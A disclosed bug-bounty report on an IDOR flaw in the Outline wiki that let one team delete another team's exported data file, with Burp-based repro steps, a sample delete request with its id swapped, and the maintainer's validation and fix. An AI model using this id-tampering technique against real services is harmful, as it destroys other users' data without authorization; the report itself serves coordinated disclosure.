Idor Lead to Delete exported data file in outline/outline

Valid

Reported on

Jul 3rd 2022


Description

In this case attacker is able to delete requested export data file

Steps to repro:- 1.Create 2 accounts 2.Login in both account and goto export section and create new export in both account 3.Delete acc1's exported file and capture this request in burp suite and change the id of this request to acc2's exported file id and forward the request

This bug required to know id of the file that's why i have set attack complexity to high

Sample Request

POST /api/fileOperations.delete HTTP/1.1
Host: HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 45
Cache-Control: no-cache
Pragma: no-cache
X-Editor-Version: 12.0.0
Origin: Redacted
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer Redirected
Te: trailers
Connection: close

{"id":"victim's id"}
// PoC.js
var payload = ...

Impact

Using this bug attacker can delete backup file of any user. Also an attacker can be able to access whole project of a organization then it create \ a huge privacy issue to any organization. since it could be turn to huge information disclosure.

We are processing your report and will contact the outline team within 24 hours. a month ago
Distorted_Hacker modified the report
a month ago
Tom Moor
a month ago

Maintainer


Please clarify reproduction the steps, your sample request doesn't include enough details.

Are the accounts on the same team? What permissions do the accounts have?

Distorted_Hacker modified the report
a month ago
outline/outline maintainer has acknowledged this report a month ago
Distorted_Hacker
a month ago

Researcher


Hi @tommoor sorry for that. I have created 2 different organisations with 2 different account So attacker own his server at attacker. Getoutline.com and victim server is victim.getoutline.com

Distorted_Hacker
a month ago

Researcher


Hi @tommoor here is the poc video link. Just ping me before making this report public since it contain my personal details so i can hide it

Tom Moor
a month ago

Maintainer


I have a fix underway, you can remove anything private.

Tom Moor validated this vulnerability a month ago
Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Distorted_Hacker
a month ago

Researcher


Hi @tommoor thanks for bounty. I have change the visibility. Thanks for acknowledgement

Tom Moor
a month ago

Maintainer


I can still access the video FWIW

Tom Moor
a month ago

Maintainer


The fix has been deployed to the cloud service, as this affects cross-team permissions only it is not applicable to the community hosted addition (You need two teams and to be admin on both).

Will disclose once you give the 👍

Distorted_Hacker
a month ago

Researcher


Hi @tommoor thanks for waiting you can disclose now

Tom Moor confirmed that a fix has been merged on 9cd261 a month ago
The fix bounty has been dropped
Distorted_Hacker
a month ago

Researcher


Hi @tommoor can you assign cve for this report?

to join this conversation